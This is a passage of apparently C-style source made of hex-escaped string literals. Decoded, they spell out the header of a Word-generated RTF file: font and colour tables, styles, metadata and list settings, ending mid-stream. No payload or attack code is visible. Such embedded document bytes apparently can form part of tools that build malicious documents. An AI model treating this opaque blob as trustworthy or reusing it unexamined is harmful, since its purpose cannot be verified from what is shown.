"\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43" "\x79\x72\x3B\x7D\x7B\x5C\x66\x34\x30\x5C\x66\x72\x6F\x6D\x61\x6E" "\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36\x31\x5C\x66\x70\x72" "\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D" "\x61\x6E\x20\x47\x72\x65\x65\x6B\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34" "\x31\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x36\x32\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73" "\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x54\x75\x72\x3B\x7D" "\x7B\x5C\x66\x34\x32\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x37\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x48\x65\x62\x72\x65\x77\x29\x3B\x7D" "\x7B\x5C\x66\x34\x33\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x38\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x41\x72\x61\x62\x69\x63\x29\x3B\x7D" "\x7B\x5C\x66\x34\x34\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" "\x61\x72\x73\x65\x74\x31\x38\x36\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x42" "\x61\x6C\x74\x69\x63\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34\x35\x5C\x66" "\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36" "\x33\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65" "\x77\x20\x52\x6F\x6D\x61\x6E\x20\x28\x56\x69\x65\x74\x6E\x61\x6D" "\x65\x73\x65\x29\x3B\x7D\x7B\x5C\x66\x31\x36\x39\x5C\x66\x6E\x69" "\x6C\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71" "\x32\x20\x53\x69\x6D\x53\x75\x6E\x20\x57\x65\x73\x74\x65\x72\x6E" "\x7B\x5C\x2A\x5C\x66\x61\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D" "\x3B\x7D\x7B\x5C\x66\x33\x39\x39\x5C\x66\x6E\x69\x6C\x5C\x66\x63" "\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x20\x40\x5C" "\x27\x63\x62\x5C\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x20" "\x57\x65\x73\x74\x65\x72\x6E\x3B\x7D\x7D\x7B\x5C\x63\x6F\x6C\x6F" "\x72\x74\x62\x6C\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E" "\x30\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72" "\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65" "\x64\x30\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65" "\x32\x35\x35\x3B\x0D\x0A\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65" "\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32" "\x35\x35\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35" "\x35\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x30" "\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67" "\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72" "\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62" "\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65" "\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64" "\x30\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x31" "\x32\x38\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E\x31\x32" "\x38\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C" "\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C" "\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C" "\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65" "\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x30\x3B\x0D\x0A\x5C\x72\x65" "\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C" "\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64\x31\x39\x32\x5C\x67\x72" "\x65\x65\x6E\x31\x39\x32\x5C\x62\x6C\x75\x65\x31\x39\x32\x3B\x7D" "\x7B\x5C\x73\x74\x79\x6C\x65\x73\x68\x65\x65\x74\x7B\x5C\x71\x6A" "\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C\x6E\x6F\x77\x69\x64\x63" "\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C" "\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75" "\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72" "\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69" "\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32\x34\x5C\x61\x6C\x61\x6E" "\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C\x6C\x61\x6E\x67\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x5C\x6B\x65" "\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63\x68\x5C\x66\x30\x5C\x68" "\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63\x68\x5C\x61\x66\x31" "\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C\x61\x6E\x67\x6E\x70\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x6E\x70\x32\x30\x35\x32\x20" "\x5C\x73\x6E\x65\x78\x74\x30\x20\x4E\x6F\x72\x6D\x61\x6C\x3B\x7D" "\x7B\x5C\x2A\x5C\x63\x73\x31\x30\x20\x5C\x61\x64\x64\x69\x74\x69" "\x76\x65\x20\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20" "\x44\x65\x66\x61\x75\x6C\x74\x20\x50\x61\x72\x61\x67\x72\x61\x70" "\x68\x20\x46\x6F\x6E\x74\x3B\x7D\x7B\x5C\x2A\x0D\x0A\x5C\x74\x73" "\x31\x31\x5C\x74\x73\x72\x6F\x77\x64\x5C\x74\x72\x66\x74\x73\x57" "\x69\x64\x74\x68\x42\x33\x5C\x74\x72\x70\x61\x64\x64\x6C\x31\x30" "\x38\x5C\x74\x72\x70\x61\x64\x64\x72\x31\x30\x38\x5C\x74\x72\x70" "\x61\x64\x64\x66\x6C\x33\x5C\x74\x72\x70\x61\x64\x64\x66\x74\x33" "\x5C\x74\x72\x70\x61\x64\x64\x66\x62\x33\x5C\x74\x72\x70\x61\x64" "\x64\x66\x72\x33\x5C\x74\x72\x63\x62\x70\x61\x74\x31\x5C\x74\x72" "\x63\x66\x70\x61\x74\x31\x5C\x74\x62\x6C\x69\x6E\x64\x30\x5C\x74" "\x62\x6C\x69\x6E\x64\x74\x79\x70\x65\x33\x5C\x74\x73\x63\x65\x6C" "\x6C\x77\x69\x64\x74\x68\x66\x74\x73\x30\x5C\x74\x73\x76\x65\x72" "\x74\x61\x6C\x74\x5C\x74\x73\x62\x72\x64\x72\x74\x5C\x74\x73\x62" "\x72\x64\x72\x6C\x5C\x74\x73\x62\x72\x64\x72\x62\x5C\x74\x73\x62" "\x72\x64\x72\x72\x5C\x74\x73\x62\x72\x64\x72\x64\x67\x6C\x5C\x74" "\x73\x62\x72\x64\x72\x64\x67\x72\x5C\x74\x73\x62\x72\x64\x72\x68" "\x5C\x74\x73\x62\x72\x64\x72\x76\x20\x0D\x0A\x5C\x71\x6C\x20\x5C" "\x6C\x69\x30\x5C\x72\x69\x30\x5C\x77\x69\x64\x63\x74\x6C\x70\x61" "\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73" "\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61" "\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74" "\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30" "\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66" "\x30\x5C\x61\x66\x73\x32\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66" "\x63\x73\x30\x20\x5C\x66\x73\x32\x30\x5C\x6C\x61\x6E\x67\x31\x30" "\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65\x31\x30\x32\x34\x5C\x6C\x6F" "\x63\x68\x5C\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x31\x30\x32\x34\x20\x5C\x73\x6E\x65\x78\x74\x31\x31\x20" "\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20\x4E\x6F\x72" "\x6D\x61\x6C\x20\x54\x61\x62\x6C\x65\x3B\x7D\x7D\x0D\x0A\x7B\x5C" "\x2A\x5C\x6C\x61\x74\x65\x6E\x74\x73\x74\x79\x6C\x65\x73\x5C\x6C" "\x73\x64\x73\x74\x69\x6D\x61\x78\x31\x35\x36\x5C\x6C\x73\x64\x6C" "\x6F\x63\x6B\x65\x64\x64\x65\x66\x30\x7D\x7B\x5C\x2A\x5C\x72\x73" "\x69\x64\x74\x62\x6C\x20\x5C\x72\x73\x69\x64\x31\x35\x38\x30\x37" "\x35\x31\x39\x7D\x7B\x5C\x2A\x5C\x67\x65\x6E\x65\x72\x61\x74\x6F" "\x72\x20\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x57\x6F\x72\x64" "\x20\x31\x31\x2E\x30\x2E\x30\x30\x30\x30\x3B\x7D\x7B\x5C\x69\x6E" "\x66\x6F\x7B\x5C\x74\x69\x74\x6C\x65\x20\x46\x66\x66\x66\x66\x66" "\x66\x66\x66\x7D\x7B\x5C\x61\x75\x74\x68\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x6F\x70\x65\x72\x61\x74\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x63\x72\x65\x61\x74\x69\x6D\x5C\x79\x72\x32\x30" "\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C\x68\x72\x31\x34" "\x5C\x6D\x69\x6E\x35\x30\x7D\x7B\x5C\x72\x65\x76\x74\x69\x6D\x5C" "\x79\x72\x32\x30\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C" "\x68\x72\x31\x34\x5C\x6D\x69\x6E\x35\x31\x7D\x7B\x5C\x76\x65\x72" "\x73\x69\x6F\x6E\x31\x7D\x0D\x0A\x7B\x5C\x65\x64\x6D\x69\x6E\x73" "\x31\x7D\x7B\x5C\x6E\x6F\x66\x70\x61\x67\x65\x73\x31\x7D\x7B\x5C" "\x6E\x6F\x66\x77\x6F\x72\x64\x73\x31\x7D\x7B\x5C\x6E\x6F\x66\x63" "\x68\x61\x72\x73\x39\x7D\x7B\x5C\x2A\x5C\x63\x6F\x6D\x70\x61\x6E" "\x79\x20\x43\x48\x49\x4E\x41\x7D\x7B\x5C\x6E\x6F\x66\x63\x68\x61" "\x72\x73\x77\x73\x39\x7D\x7B\x5C\x76\x65\x72\x6E\x32\x34\x36\x31" "\x33\x7D\x7B\x5C\x2A\x5C\x70\x61\x73\x73\x77\x6F\x72\x64\x20\x30" "\x30\x30\x30\x30\x30\x30\x30\x7D\x7D\x7B\x5C\x2A\x5C\x78\x6D\x6C" "\x6E\x73\x74\x62\x6C\x20\x7B\x5C\x78\x6D\x6C\x6E\x73\x31\x20\x68" "\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x6D\x69" "\x63\x72\x6F\x73\x6F\x66\x74\x2E\x63\x6F\x6D\x2F\x6F\x66\x66\x69" "\x63\x65\x2F\x77\x6F\x72\x64\x2F\x32\x30\x30\x33\x2F\x77\x6F\x72" "\x64\x6D\x6C\x7D\x7D\x0D\x0A\x5C\x70\x61\x70\x65\x72\x77\x31\x31" "\x39\x30\x36\x5C\x70\x61\x70\x65\x72\x68\x31\x36\x38\x33\x38\x5C" "\x6D\x61\x72\x67\x6C\x31\x38\x30\x30\x5C\x6D\x61\x72\x67\x72\x31" "\x38\x30\x30\x5C\x6D\x61\x72\x67\x74\x31\x34\x34\x30\x5C\x6D\x61" "\x72\x67\x62\x31\x34\x34\x30\x5C\x67\x75\x74\x74\x65\x72\x30\x5C" "\x6C\x74\x72\x73\x65\x63\x74\x20\x0D\x0A\x5C\x64\x65\x66\x74\x61" "\x62\x34\x32\x30\x5C\x66\x74\x6E\x62\x6A\x5C\x61\x65\x6E\x64\x64" "\x6F\x63\x5C\x64\x6F\x6E\x6F\x74\x65\x6D\x62\x65\x64\x73\x79\x73" "\x66\x6F\x6E\x74\x31\x5C\x64\x6F\x6E\x6F\x74\x65\x6D\x62\x65\x64" "\x6C\x69\x6E\x67\x64\x61\x74\x61\x30\x5C\x67\x72\x66\x64\x6F\x63" "\x65\x76\x65\x6E\x74\x73\x30\x5C\x76\x61\x6C\x69\x64\x61\x74\x65" "\x78\x6D\x6C\x31\x5C\x73\x68\x6F\x77\x70\x6C\x61\x63\x65\x68\x6F" "\x6C\x64\x74\x65\x78\x74\x30\x5C\x69\x67\x6E\x6F\x72\x65\x6D\x69" "\x78\x65\x64\x63\x6F\x6E\x74\x65\x6E\x74\x30\x5C\x73\x61\x76\x65" "\x69\x6E\x76\x61\x6C\x69\x64\x78\x6D\x6C\x30\x5C\x73\x68\x6F\x77" "\x78\x6D\x6C\x65\x72\x72\x6F\x72\x73\x31\x5C\x66\x6F\x72\x6D\x73" "\x68\x61\x64\x65\x5C\x68\x6F\x72\x7A\x64\x6F\x63\x5C\x64\x67\x6D" "\x61\x72\x67\x69\x6E\x5C\x64\x67\x68\x73\x70\x61\x63\x65\x31\x38" "\x30\x5C\x64\x67\x76\x73\x70\x61\x63\x65\x31\x35\x36\x5C\x64\x67" "\x68\x6F\x72\x69\x67\x69\x6E\x31\x38\x30\x30\x5C\x64\x67\x76\x6F" "\x72\x69\x67\x69\x6E\x31\x34\x34\x30\x5C\x64\x67\x68\x73\x68\x6F" "\x77\x30\x0D\x0A\x5C\x64\x67\x76\x73\x68\x6F\x77\x32\x5C\x6A\x63" "\x6F\x6D\x70\x72\x65\x73\x73\x5C\x6C\x6E\x6F\x6E\x67\x72\x69\x64" "\x5C\x76\x69\x65\x77\x6B\x69\x6E\x64\x31\x5C\x76\x69\x65\x77\x73" "\x63\x61\x6C\x65\x31\x30\x30\x5C\x73\x70\x6C\x79\x74\x77\x6E\x69" "\x6E\x65\x5C\x66\x74\x6E\x6C\x79\x74\x77\x6E\x69\x6E\x65\x5C\x68" "\x74\x6D\x61\x75\x74\x73\x70\x5C\x75\x73\x65\x6C\x74\x62\x61\x6C" "\x6E\x5C\x61\x6C\x6E\x74\x62\x6C\x69\x6E\x64\x5C\x6C\x79\x74\x63" "\x61\x6C\x63\x74\x62\x6C\x77\x64\x5C\x6C\x79\x74\x74\x62\x6C\x72" "\x74\x67\x72\x5C\x6C\x6E\x62\x72\x6B\x72\x75\x6C\x65\x5C\x6E\x6F" "\x62\x72\x6B\x77\x72\x70\x74\x62\x6C\x5C\x76\x69\x65\x77\x6E\x6F" "\x62\x6F\x75\x6E\x64\x31\x5C\x73\x6E\x61\x70\x74\x6F\x67\x72\x69" "\x64\x69\x6E\x63\x65\x6C\x6C\x5C\x61\x6C\x6C\x6F\x77\x66\x69\x65" "\x6C\x64\x65\x6E\x64\x73\x65\x6C\x5C\x77\x72\x70\x70\x75\x6E\x63" "\x74\x5C\x61\x73\x69\x61\x6E\x62\x72\x6B\x72\x75\x6C\x65\x5C\x72" "\x73\x69\x64\x72\x6F\x6F\x74\x31\x35\x38\x30\x37\x35\x31\x39\x0D" "\x0A\x5C\x6E\x65\x77\x74\x62\x6C\x73\x74\x79\x72\x75\x6C\x73\x5C" "\x6E\x6F\x67\x72\x6F\x77\x61\x75\x74\x6F\x66\x69\x74\x20\x7B\x5C" "\x2A\x5C\x66\x63\x68\x61\x72\x73\x20\x0D\x0A\x21\x29\x2C\x2E\x3A" "\x5C\x27\x33\x62\x3F\x5D\x5C\x27\x37\x64\x5C\x27\x61\x31\x5C\x27" "\x61\x37\x5C\x27\x61\x31\x5C\x27\x61\x34\x5C\x27\x61\x31\x5C\x27" "\x61\x36\x5C\x27\x61\x31\x5C\x27\x61\x35\x5C\x27\x61\x38\x5C\x27" "\x34\x34\x5C\x27\x61\x31\x5C\x27\x61\x63\x5C\x27\x61\x31\x5C\x27" "\x61\x66\x5C\x27\x61\x31\x5C\x27\x62\x31\x5C\x27\x61\x31\x5C\x27" "\x61\x64\x5C\x27\x61\x31\x5C\x27\x63\x33\x5C\x27\x61\x31\x5C\x27" "\x61\x32\x5C\x27\x61\x31\x5C\x27\x61\x33\x5C\x27\x61\x31\x5C\x27" "\x61\x38\x5C\x27\x61\x31\x5C\x27\x61\x39\x5C\x27\x61\x31\x5C\x27" "\x62\x35\x5C\x27\x61\x31\x5C\x27\x62\x37\x5C\x27\x61\x31\x5C\x27" "\x62\x39\x5C\x27\x61\x31\x5C\x27\x62\x62\x5C\x27\x61\x31\x5C\x27" "\x62\x66\x5C\x27\x61\x31\x5C\x27\x62\x33\x5C\x27\x61\x31\x5C\x27" "\x62\x64\x5C\x27\x61\x33\x5C\x27\x61\x31\x5C\x27\x61\x33\x5C\x27" "\x61\x32\x5C\x27\x61\x33\x5C\x27\x61\x37\x5C\x27\x61\x33\x5C\x27" "\x61\x39\x5C\x27\x61\x33\x5C\x27\x61\x63\x5C\x27\x61\x33\x5C\x27" "\x61\x65\x5C\x27\x61\x33\x5C\x27\x62\x61\x5C\x27\x61\x33\x5C\x27" "\x62\x62\x5C\x27\x61\x33\x5C\x27\x62\x66\x5C\x27\x61\x33\x5C\x27" "\x64\x64\x5C\x27\x61\x33\x5C\x27\x65\x30\x5C\x27\x61\x33\x5C\x27" "\x66\x63\x5C\x27\x61\x33\x5C\x27\x66\x64\x5C\x27\x61\x31\x5C\x27" "\x61\x62\x5C\x27\x61\x31\x5C\x27\x65\x39\x0D\x0A\x7D\x7B\x5C\x2A" "\x5C\x6C\x63\x68\x61\x72\x73\x20\x28\x5B\x5C\x27\x37\x62\x5C\x27" "\x61\x31\x5C\x27\x61\x34\x5C\x27\x61\x31\x5C\x27\x61\x65\x5C\x27" "\x61\x31\x5C\x27\x62\x30\x5C\x27\x61\x31\x5C\x27\x62\x34\x5C\x27" "\x61\x31\x5C\x27\x62\x36\x5C\x27\x61\x31\x5C\x27\x62\x38\x5C\x27" "\x61\x31\x5C\x27\x62\x61\x5C\x27\x61\x31\x5C\x27\x62\x65\x5C\x27" "\x61\x31\x5C\x27\x62\x32\x5C\x27\x61\x31\x5C\x27\x62\x63\x5C\x27" "\x61\x33\x5C\x27\x61\x38\x5C\x27\x61\x33\x5C\x27\x61\x65\x5C\x27" "\x61\x33\x5C\x27\x64\x62\x5C\x27\x61\x33\x5C\x27\x66\x62\x5C\x27" "\x61\x31\x5C\x27\x65\x61\x5C\x27\x61\x33\x5C\x27\x61\x34\x7D\x5C" "\x66\x65\x74\x30\x7B\x5C\x2A\x5C\x77\x67\x72\x66\x66\x6D\x74\x66" "\x69\x6C\x74\x65\x72\x20\x30\x31\x33\x66\x7D\x5C\x69\x6C\x66\x6F" "\x6D\x61\x63\x61\x74\x63\x6C\x6E\x75\x70\x30\x5C\x6C\x74\x72\x70" "\x61\x72\x20\x5C\x73\x65\x63\x74\x64\x20\x5C\x6C\x74\x72\x73\x65" "\x63\x74\x0D\x0A\x5C\x6C\x69\x6E\x65\x78\x30\x5C\x68\x65\x61\x64" "\x65\x72\x79\x38\x35\x31\x5C\x66\x6F\x6F\x74\x65\x72\x79\x39\x39" "\x32\x5C\x63\x6F\x6C\x73\x78\x34\x32\x35\x5C\x65\x6E\x64\x6E\x68" "\x65\x72\x65\x5C\x73\x65\x63\x74\x6C\x69\x6E\x65\x67\x72\x69\x64" "\x33\x31\x32\x5C\x73\x65\x63\x74\x73\x70\x65\x63\x69\x66\x79\x6C" "\x5C\x73\x66\x74\x6E\x62\x6A\x20\x7B\x5C\x2A\x5C\x70\x6E\x73\x65" "\x63\x6C\x76\x6C\x31\x5C\x70\x6E\x75\x63\x72\x6D\x5C\x70\x6E\x73" "\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32" "\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74" "\x61\x20\x5C\x64\x62\x63\x68\x20\x2E\x7D\x7D\x7B\x5C\x2A\x5C\x70" "\x6E\x73\x65\x63\x6C\x76\x6C\x32\x5C\x70\x6E\x75\x63\x6C\x74\x72" "\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65" "\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70" "\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x2E\x7D\x7D\x7B" "\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x33\x0D\x0A\x5C\x70" "\x6E\x64\x65\x63\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E" "\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67" "\x20\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20" "\x2E\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x34" "\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C\x70\x6E\x73\x74\x61\x72\x74" "\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E" "\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64" "\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63" "\x6C\x76\x6C\x35\x5C\x70\x6E\x64\x65\x63\x5C\x70\x6E\x73\x74\x61" "\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C" "\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20" "\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61" "\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E" "\x73\x65\x63\x6C\x76\x6C\x36\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C" "\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E" "\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x0D\x0A\x7B\x5C" "\x70\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B" "\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x29\x7D" "\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x37\x5C\x70" "\x6E\x6C\x63\x72\x6D\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70" "\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E" "\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68" "\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63" "\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76" "\x6C\x38\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C\x70\x6E\x73\x74\x61" "\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C" "\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20" "\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61" "\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E" "\x73\x65\x63\x6C\x76\x6C\x39\x5C\x70\x6E\x6C\x63\x72\x6D\x5C\x70" "\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74" "\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x0D\x0A\x7B\x5C\x70" "\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C" "\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D" "\x5C\x70\x61\x72\x64\x5C\x70\x6C\x61\x69\x6E\x20\x5C\x6C\x74\x72" "\x70\x61\x72\x5C\x71\x6A\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C" "\x6E\x6F\x77\x69\x64\x63\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70" "\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61" "\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61" "\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C" "\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63" "\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32" "\x34\x5C\x61\x6C\x61\x6E\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72" "\x63\x68\x5C\x66\x63\x73\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C" "\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32" "\x30\x35\x32\x5C\x6B\x65\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63" "\x68\x5C\x61\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x32\x30\x35\x32\x20\x7B\x5C\x72\x74\x6C\x63\x68\x5C\x66" "\x63\x73\x31\x20\x5C\x61\x66\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C" "\x66\x63\x73\x30\x20\x5C\x69\x6E\x73\x72\x73\x69\x64\x31\x35\x38" "\x30\x37\x35\x31\x39\x20\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C" "\x64\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x6C\x6F\x63\x68\x5C\x66" "\x30\x20\x46\x7D\x7B\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x5C\x69\x6E\x73\x72\x73\x69\x64\x31\x35\x38\x30\x37\x35" 